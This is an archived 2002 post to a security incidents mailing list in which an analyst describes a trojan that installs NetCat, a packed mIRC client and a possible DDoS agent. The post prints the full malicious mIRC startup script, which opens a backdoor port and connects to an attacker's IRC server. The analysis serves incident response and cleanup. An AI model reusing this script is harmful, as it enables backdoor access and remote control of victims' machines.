Security Incidents mailing list archives

Re: Q328691 ?

From: Kyle Lai <aladin168 () hotmail com>
Date: 11 Sep 2002 08:48:02 -0000

In-Reply-To: <F1E50062AEB5D411971E002035710A7304C3F950@MSXDENUSR01>

One of the Microsoft PSS Security Specialist contacted me after reading my 
analysis.  I gave them a copy of the virus/trojan/malware I analyzed, and 
I also expressed my concern about their analysis.  I did not hear back 
from them yesterday, but maybe we should give them couple days.  However, 
I still want to make sure everyone that was infected to run Anti-Trojan 
software to remove any trojan and hacker tools.  It's detailed in my 
analysis.

http://groups.google.com/groups?dq=&start=25&hl=zh-TW&lr=&ie=UTF-8&oe=UTF-
8&group=microsoft.public.scripting.virus.discussion&selm=bf0f8e77.020908070
6.7f395b0c%40posting.google.com

I did point out that there was a file called "ncp.exe", which in fact was 
NetCat, one of hacker's favorite tool that could possibly allow a hacker 
to remote control the victims' systems...  The other one is mt.exe, could 
be a dDoS agent (not confirmed).  MS is aware of these situations.  Let's 
make sure all the victims' out there are at least recovering their systems 
properly!

Also, secedit.bat did NOT change the security policies.  "DLL32NT.HLP" was 
the actual text (mirc script) file that caused the problems...

Here is the actual script that got run:
+++++++++++++
on *:start:{ if ($exists(mdm.exe) == $false) { exit } | //run 
mdm.exe /n /fh         | //set %server DEM0N.daemon.sh | //set %timeout 10 
| if ($portfree(60609) == $false) { exit } |  if ($portfree(60609) == 
$true) { /socklisten blah 60609 } | //nick $read mdm.scr $+ $r(1,9) 
| //timerc 1 4 //server %server $+ : $+ 6667 | //run mdm.exe /n /fh        
| //remini NT32.ini ident userid | //remini NT32.ini mirc user | //remini 
NT32.ini mirc email | //writeini NT32.ini ident userid $read mdm.scr 
| //writeini NT32.ini mirc user $randomgen($r(0,9)) | //writeini NT32.ini 
mirc email $randomgen($r(0,9)) | //identd on $r(a,z) $+ $read mdm.scr $+ $r
(a,z)  |  //timercoolconnect -o 0 100 //server %server 6667 |  //timer 1 
1 //run -n secedit /configure /DB secedit.sdb /cfg $mircdir $+ 
tftp8675 /quiet |  fos }
+++++++++++++

As I looked in further, the "designer" of this trojan/malware used "UPX 
Executable Packer" from http://upx.sourceforge.net to compact the 
taskmngr.exe (really a mirc 5.70 client), so it reduced the filesize from 
(1.3M) to 442K.  It also compacted so well, there are very few ASCII 
characters to read from Hex Editor.  Once you use UPX to decompress it, 
you can read a lot more.  I am still trying to see if anything was 
modified.  Please let me know if anyone find anything out there.  I am not 
sure if the mirc client has been modified...  

The above script also opened a backdoor port 60609...

If you have more info, please pass along.

Regards,

Kyle Lai, CISSP, CISA
Kyle Lai Consulting
aladin168 () hotmail com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Re: Q328691 ?, (continued)
- Re: Q328691 ? Security (Sep 09)
  - Re: Q328691 ? sunzi (Sep 09)
- Re: SV: Q328691 ? H C (Sep 09)
- Re: Q328691 ? Bernt Lervik (Sep 09)
  - RE: Q328691 ? Jason Coombs (Sep 09)
- Re: Q328691 ? Bronek Kozicki (Sep 09)
  - Re: Q328691 ? H C (Sep 09)
- Re: SV: Q328691 ? jennifer smith (Sep 09)
  - Re: SV: Q328691 ? H C (Sep 09)
- RE: Q328691 ? Byrne, David (Sep 10)
- Re: Q328691 ? Kyle Lai (Sep 11)